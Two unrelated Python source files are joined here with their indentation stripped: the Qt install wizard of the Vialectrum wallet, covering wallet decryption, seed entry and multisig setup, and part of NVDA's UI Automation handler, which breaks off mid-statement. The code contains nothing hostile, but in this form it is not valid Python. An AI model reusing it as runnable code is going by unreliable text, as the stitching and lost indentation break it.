# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Vialectrum - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for the base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/vialectrum.png')
self.show()
self.raise_()
self.refresh_gui() # Needed for Qt on macOS. Lame.
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Vialectrum wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except IOError:
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
else:
if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
# FIXME if we get here because of mistyped passphrase
# then that passphrase gets "cached"
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet()
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
return self.text_input(title, message, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=()):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMaximumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Vialectrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Vialectrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
_UIAHandler.py
|
#_UIAHandler.py
#A part of NonVisual Desktop Access (NVDA)
#Copyright (C) 2011-2019 NV Access Limited, Joseph Lee, Babbage B.V.
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
from ctypes import *
from ctypes.wintypes import *
import comtypes.client
from comtypes.automation import VT_EMPTY
from comtypes import *
import weakref
import threading
import time
from collections import namedtuple
import config
import api
import appModuleHandler
import queueHandler
import controlTypes
import NVDAHelper
import winKernel
import winUser
import eventHandler
from logHandler import log
import UIAUtils
from comtypes.gen.UIAutomationClient import *
#Some newer UIA constants that could be missing
ItemIndex_Property_GUID=GUID("{92A053DA-2969-4021-BF27-514CFC2E4A69}")
ItemCount_Property_GUID=GUID("{ABBF5C45-5CCC-47b7-BB4E-87CB87BBD162}")
HorizontalTextAlignment_Left=0
HorizontalTextAlignment_Centered=1
HorizontalTextAlignment_Right=2
HorizontalTextAlignment_Justified=3
# The name of the WDAG (Windows Defender Application Guard) process
WDAG_PROCESS_NAME=u'hvsirdpclient'
goodUIAWindowClassNames=[
# A WDAG (Windows Defender Application Guard) Window is always native UIA, even if it doesn't report as such.
'RAIL_WINDOW',
]
badUIAWindowClassNames=[
"SysTreeView32",
"WuDuiListView",
"ComboBox",
"msctls_progress32",
"Edit",
"CommonPlacesWrapperWndClass",
"SysMonthCal32",
"SUPERGRID", #Outlook 2010 message list
"RichEdit",
"RichEdit20",
"RICHEDIT50W",
"SysListView32",
"EXCEL7",
"Button",
# #7497: Windows 10 Fall Creators Update has an incomplete UIA implementation for console windows, therefore for now we should ignore it.
# It does not implement caret/selection, and probably has no new text events.
"ConsoleWindowClass",
# #8944: The Foxit UIA implementation is incomplete and should not be used for now.
"FoxitDocWnd",
]
# #8405: used to detect UIA dialogs prior to Windows 10 RS5.
UIADialogClassNames=[
"#32770",
"NUIDialog",
"Credential Dialog Xaml Host", # UAC dialog in Anniversary Update and later
"Shell_Dialog",
"Shell_Flyout",
"Shell_SystemDialog", # Various dialogs in Windows 10 Settings app
]
NVDAUnitsToUIAUnits={
"character":TextUnit_Character,
"word":TextUnit_Word,
"line":TextUnit_Line,
"paragraph":TextUnit_Paragraph,
"readingChunk":TextUnit_Line,
}
UIAControlTypesToNVDARoles={
UIA_ButtonControlTypeId:controlTypes.ROLE_BUTTON,
UIA_CalendarControlTypeId:controlTypes.ROLE_CALENDAR,
UIA_CheckBoxControlTypeId:controlTypes.ROLE_CHECKBOX,
UIA_ComboBoxControlTypeId:controlTypes.ROLE_COMBOBOX,
UIA_EditControlTypeId:controlTypes.ROLE_EDITABLETEXT,
UIA_HyperlinkControlTypeId:controlTypes.ROLE_LINK,
UIA_ImageControlTypeId:controlTypes.ROLE_GRAPHIC,
UIA_ListItemControlTypeId:controlTypes.ROLE_LISTITEM,
UIA_ListControlTypeId:controlTypes.ROLE_LIST,
UIA_MenuControlTypeId:controlTypes.ROLE_POPUPMENU,
UIA_MenuBarControlTypeId:controlTypes.ROLE_MENUBAR,
UIA_MenuItemControlTypeId:controlTypes.ROLE_MENUITEM,
UIA_ProgressBarControlTypeId:controlTypes.ROLE_PROGRESSBAR,
UIA_RadioButtonControlTypeId:controlTypes.ROLE_RADIOBUTTON,
UIA_ScrollBarControlTypeId:controlTypes.ROLE_SCROLLBAR,
UIA_SliderControlTypeId:controlTypes.ROLE_SLIDER,
UIA_SpinnerControlTypeId:controlTypes.ROLE_SPINBUTTON,
UIA_StatusBarControlTypeId:controlTypes.ROLE_STATUSBAR,
UIA_TabControlTypeId:controlTypes.ROLE_TABCONTROL,
UIA_TabItemControlTypeId:controlTypes.ROLE_TAB,
UIA_TextControlTypeId:controlTypes.ROLE_STATICTEXT,
UIA_ToolBarControlTypeId:controlTypes.ROLE_TOOLBAR,
UIA_ToolTipControlTypeId:controlTypes.ROLE_TOOLTIP,
UIA_TreeControlTypeId:controlTypes.ROLE_TREEVIEW,
UIA_TreeItemControlTypeId:controlTypes.ROLE_TREEVIEWITEM,
UIA_CustomControlTypeId:controlTypes.ROLE_UNKNOWN,
UIA_GroupControlTypeId:controlTypes.ROLE_GROUPING,
UIA_ThumbControlTypeId:controlTypes.ROLE_THUMB,
UIA_DataGridControlTypeId:controlTypes.ROLE_DATAGRID,
UIA_DataItemControlTypeId:controlTypes.ROLE_DATAITEM,
UIA_DocumentControlTypeId:controlTypes.ROLE_DOCUMENT,
UIA_SplitButtonControlTypeId:controlTypes.ROLE_SPLITBUTTON,
UIA_WindowControlTypeId:controlTypes.ROLE_WINDOW,
UIA_PaneControlTypeId:controlTypes.ROLE_PANE,
UIA_HeaderControlTypeId:controlTypes.ROLE_HEADER,
UIA_HeaderItemControlTypeId:controlTypes.ROLE_HEADERITEM,
UIA_TableControlTypeId:controlTypes.ROLE_TABLE,
UIA_TitleBarControlTypeId:controlTypes.ROLE_TITLEBAR,
UIA_SeparatorControlTypeId:controlTypes.ROLE_SEPARATOR,
}
UIAPropertyIdsToNVDAEventNames={
UIA_NamePropertyId:"nameChange",
UIA_HelpTextPropertyId:"descriptionChange",
UIA_ExpandCollapseExpandCollapseStatePropertyId:"stateChange",
UIA_ToggleToggleStatePropertyId:"stateChange",
UIA_IsEnabledPropertyId:"stateChange",
UIA_ValueValuePropertyId:"valueChange",
UIA_RangeValueValuePropertyId:"valueChange",
UIA_ControllerForPropertyId:"UIA_controllerFor",
UIA_ItemStatusPropertyId:"UIA_itemStatus",
}
UIAEventIdsToNVDAEventNames={
UIA_LiveRegionChangedEventId:"liveRegionChange",
#UIA_Text_TextChangedEventId:"textChanged",
UIA_SelectionItem_ElementSelectedEventId:"UIA_elementSelected",
UIA_MenuOpenedEventId:"gainFocus",
UIA_SelectionItem_ElementAddedToSelectionEventId:"stateChange",
UIA_SelectionItem_ElementRemovedFromSelectionEventId:"stateChange",
#UIA_MenuModeEndEventId:"menuModeEnd",
#UIA_Text_TextSelectionChangedEventId:"caret",
UIA_ToolTipOpenedEventId:"UIA_toolTipOpened",
#UIA_AsyncContentLoadedEventId:"documentLoadComplete",
#UIA_ToolTipClosedEventId:"hide",
UIA_Window_WindowOpenedEventId:"UIA_window_windowOpen",
UIA_SystemAlertEventId:"UIA_systemAlert",
}
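# The two maps above drive UIAHandler below: property IDs are registered via
# AddPropertyChangedEventHandler and event IDs via addAutomationEventHandler, and incoming
# UIA notifications are translated to the listed NVDA event names before being queued.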
class UIAHandler(COMObject):
_com_interfaces_=[IUIAutomationEventHandler,IUIAutomationFocusChangedEventHandler,IUIAutomationPropertyChangedEventHandler,IUIAutomationNotificationEventHandler]
def __init__(self):
super(UIAHandler,self).__init__()
self.MTAThreadInitEvent=threading.Event()
self.MTAThreadStopEvent=threading.Event()
self.MTAThreadInitException=None
self.MTAThread=threading.Thread(target=self.MTAThreadFunc)
self.MTAThread.daemon=True
self.MTAThread.start()
self.MTAThreadInitEvent.wait(2)
if self.MTAThreadInitException:
raise self.MTAThreadInitException
def terminate(self):
MTAThreadHandle=HANDLE(windll.kernel32.OpenThread(winKernel.SYNCHRONIZE,False,self.MTAThread.ident))
self.MTAThreadStopEvent.set()
#Wait for the MTA thread to die (while still message pumping)
if windll.user32.MsgWaitForMultipleObjects(1,byref(MTAThreadHandle),False,200,0)!=0:
log.debugWarning("Timeout or error while waiting for UIAHandler MTA thread")
windll.kernel32.CloseHandle(MTAThreadHandle)
del self.MTAThread
def MTAThreadFunc(self):
try:
oledll.ole32.CoInitializeEx(None,comtypes.COINIT_MULTITHREADED)
isUIA8=False
try:
self.clientObject=CoCreateInstance(CUIAutomation8._reg_clsid_,interface=IUIAutomation,clsctx=CLSCTX_INPROC_SERVER)
isUIA8=True
except (COMError,WindowsError,NameError):
self.clientObject=CoCreateInstance(CUIAutomation._reg_clsid_,interface=IUIAutomation,clsctx=CLSCTX_INPROC_SERVER)
# #7345: Instruct UIA to never map MSAA winEvents to UIA propertyChange events.
# These events are not needed by NVDA, and they can cause the UI Automation client library to become unresponsive if an application firing winEvents has a slow message pump.
pfm=self.clientObject.proxyFactoryMapping
for index in xrange(pfm.count):
e=pfm.getEntry(index)
for propertyID in UIAPropertyIdsToNVDAEventNames.keys():
# Check if this proxy has mapped any winEvents to the UIA propertyChange event for this property ID
try:
oldWinEvents=e.getWinEventsForAutomationEvent(UIA_AutomationPropertyChangedEventId,propertyID)
except IndexError:
# comtypes does not seem to correctly handle a returned empty SAFEARRAY, raising IndexError
oldWinEvents=None
if oldWinEvents:
# As winEvents were mapped, replace them with an empty list
e.setWinEventsForAutomationEvent(UIA_AutomationPropertyChangedEventId,propertyID,[])
# Changes to an entry are not automatically picked up.
# Therefore remove the entry and re-insert it.
pfm.removeEntry(index)
pfm.insertEntry(index,e)
if isUIA8:
# #8009: use appropriate interface based on highest supported interface.
# #8338: made easier by traversing interfaces supported on Windows 8 and later in reverse.
for interface in reversed(CUIAutomation8._com_interfaces_):
try:
self.clientObject=self.clientObject.QueryInterface(interface)
break
except COMError:
pass
# Windows 10 RS5 provides new performance features for UI Automation including event coalescing and connection recovery.
# Enable all of these where available.
if isinstance(self.clientObject,IUIAutomation6):
self.clientObject.CoalesceEvents=CoalesceEventsOptions_Enabled
self.clientObject.ConnectionRecoveryBehavior=ConnectionRecoveryBehaviorOptions_Enabled
log.info("UIAutomation: %s"%self.clientObject.__class__.__mro__[1].__name__)
self.windowTreeWalker=self.clientObject.createTreeWalker(self.clientObject.CreateNotCondition(self.clientObject.CreatePropertyCondition(UIA_NativeWindowHandlePropertyId,0)))
self.windowCacheRequest=self.clientObject.CreateCacheRequest()
self.windowCacheRequest.AddProperty(UIA_NativeWindowHandlePropertyId)
self.UIAWindowHandleCache={}
self.baseTreeWalker=self.clientObject.RawViewWalker
self.baseCacheRequest=self.windowCacheRequest.Clone()
import UIAHandler
self.ItemIndex_PropertyId=NVDAHelper.localLib.registerUIAProperty(byref(ItemIndex_Property_GUID),u"ItemIndex",1)
self.ItemCount_PropertyId=NVDAHelper.localLib.registerUIAProperty(byref(ItemCount_Property_GUID),u"ItemCount",1)
for propertyId in (UIA_FrameworkIdPropertyId,UIA_AutomationIdPropertyId,UIA_ClassNamePropertyId,UIA_ControlTypePropertyId,UIA_ProviderDescriptionPropertyId,UIA_ProcessIdPropertyId,UIA_IsTextPatternAvailablePropertyId,UIA_IsContentElementPropertyId,UIA_IsControlElementPropertyId):
self.baseCacheRequest.addProperty(propertyId)
self.baseCacheRequest.addPattern(UIA_TextPatternId)
self.rootElement=self.clientObject.getRootElementBuildCache(self.baseCacheRequest)
self.reservedNotSupportedValue=self.clientObject.ReservedNotSupportedValue
self.ReservedMixedAttributeValue=self.clientObject.ReservedMixedAttributeValue
self.clientObject.AddFocusChangedEventHandler(self.baseCacheRequest,self)
self.clientObject.AddPropertyChangedEventHandler(self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self,UIAPropertyIdsToNVDAEventNames.keys())
for x in UIAEventIdsToNVDAEventNames.iterkeys():
self.clientObject.addAutomationEventHandler(x,self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self)
# #7984: add support for notification event (IUIAutomation5, part of Windows 10 build 16299 and later).
if isinstance(self.clientObject, IUIAutomation5):
self.clientObject.AddNotificationEventHandler(self.rootElement,TreeScope_Subtree,self.baseCacheRequest,self)
except Exception as e:
self.MTAThreadInitException=e
finally:
self.MTAThreadInitEvent.set()
self.MTAThreadStopEvent.wait()
self.clientObject.RemoveAllEventHandlers()
def IUIAutomationEventHandler_HandleAutomationEvent(self,sender,eventID):
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
if eventID==UIA_MenuOpenedEventId and eventHandler.isPendingEvents("gainFocus"):
# We don't need the menuOpened event if focus has been fired,
# as focus should be more correct.
return
NVDAEventName=UIAEventIdsToNVDAEventNames.get(eventID,None)
if not NVDAEventName:
return
if not self.isNativeUIAElement(sender):
return
window=self.getNearestWindowHandle(sender)
if window and not eventHandler.shouldAcceptEvent(NVDAEventName,windowHandle=window):
return
import NVDAObjects.UIA
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if (
not obj
or (NVDAEventName=="gainFocus" and not obj.shouldAllowUIAFocusEvent)
or (NVDAEventName=="liveRegionChange" and not obj._shouldAllowUIALiveRegionChangeEvent)
):
return
focus=api.getFocusObject()
if obj==focus:
obj=focus
eventHandler.queueEvent(NVDAEventName,obj)
# The last UIAElement that received a UIA focus event
# This is updated regardless of whether the element is native, the window is UIA-blacklisted by NVDA, or the element is proxied from MSAA
lastFocusedUIAElement=None
def IUIAutomationFocusChangedEventHandler_HandleFocusChangedEvent(self,sender):
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
self.lastFocusedUIAElement=sender
if not self.isNativeUIAElement(sender):
return
import NVDAObjects.UIA
if isinstance(eventHandler.lastQueuedFocusObject,NVDAObjects.UIA.UIA):
lastFocus=eventHandler.lastQueuedFocusObject.UIAElement
# Ignore duplicate focus events.
# It seems that it is possible for compareElements to return True, even though the objects are different.
# Therefore, don't ignore the event if the last focus object has lost its hasKeyboardFocus state.
if self.clientObject.compareElements(sender,lastFocus) and lastFocus.currentHasKeyboardFocus:
return
window=self.getNearestWindowHandle(sender)
if window and not eventHandler.shouldAcceptEvent("gainFocus",windowHandle=window):
return
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if not obj or not obj.shouldAllowUIAFocusEvent:
return
eventHandler.queueEvent("gainFocus",obj)
def IUIAutomationPropertyChangedEventHandler_HandlePropertyChangedEvent(self,sender,propertyId,newValue):
# #3867: For now manually force this VARIANT type to empty to get around a nasty double free in comtypes/ctypes.
# We also don't use the value in this callback.
newValue.vt=VT_EMPTY
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
NVDAEventName=UIAPropertyIdsToNVDAEventNames.get(propertyId,None)
if not NVDAEventName:
return
if not self.isNativeUIAElement(sender):
return
window=self.getNearestWindowHandle(sender)
if window and not eventHandler.shouldAcceptEvent(NVDAEventName,windowHandle=window):
return
import NVDAObjects.UIA
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if not obj:
return
focus=api.getFocusObject()
if obj==focus:
obj=focus
eventHandler.queueEvent(NVDAEventName,obj)
def IUIAutomationNotificationEventHandler_HandleNotificationEvent(self,sender,NotificationKind,NotificationProcessing,displayString,activityId):
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
import NVDAObjects.UIA
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if not obj:
# Sometimes notification events can be fired on a UIAElement that has no windowHandle and does not connect through parents back to the desktop.
# There is nothing we can do with these.
return
eventHandler.queueEvent("UIA_notification",obj, notificationKind=NotificationKind, notificationProcessing=NotificationProcessing, displayString=displayString, activityId=activityId)
def _isUIAWindowHelper(self,hwnd):
# UIA in NVDA's process freezes in Windows 7 and below
processID=winUser.getWindowThreadProcessID(hwnd)[0]
if windll.kernel32.GetCurrentProcessId()==processID:
return False
import NVDAObjects.window
windowClass=NVDAObjects.window.Window.normalizeWindowClassName(winUser.getClassName(hwnd))
# For certain window classes, we always want to use UIA.
if windowClass in goodUIAWindowClassNames:
return True
# allow the appModule for the window to also choose if this window is good
# An appModule should be able to override bad UIA class names as prescribed by core
appModule=appModuleHandler.getAppModuleFromProcessID(processID)
if appModule and appModule.isGoodUIAWindow(hwnd):
return True
# There are certain window classes that just had bad UIA implementations
if windowClass in badUIAWindowClassNames:
return False
# allow the appModule for the window to also choose if this window is bad
if appModule and appModule.isBadUIAWindow(hwnd):
return False
# Ask the window if it supports UIA natively
res=windll.UIAutomationCore.UiaHasServerSideProvider(hwnd)
if res:
# the window does support UIA natively, but
# MS Word documents now have a fairly usable UI Automation implementation. However,
# builds of MS Office 2016 before build 9000 or so had bugs which we cannot work around.
# And even current builds of Office 2016 are still missing enough info from UIA that it is still impossible to switch to UIA completely.
# Therefore, if we can inject in-process, refuse to use UIA and instead fall back to the MS Word object model.
if (
# An MS Word document window
windowClass=="_WwG"
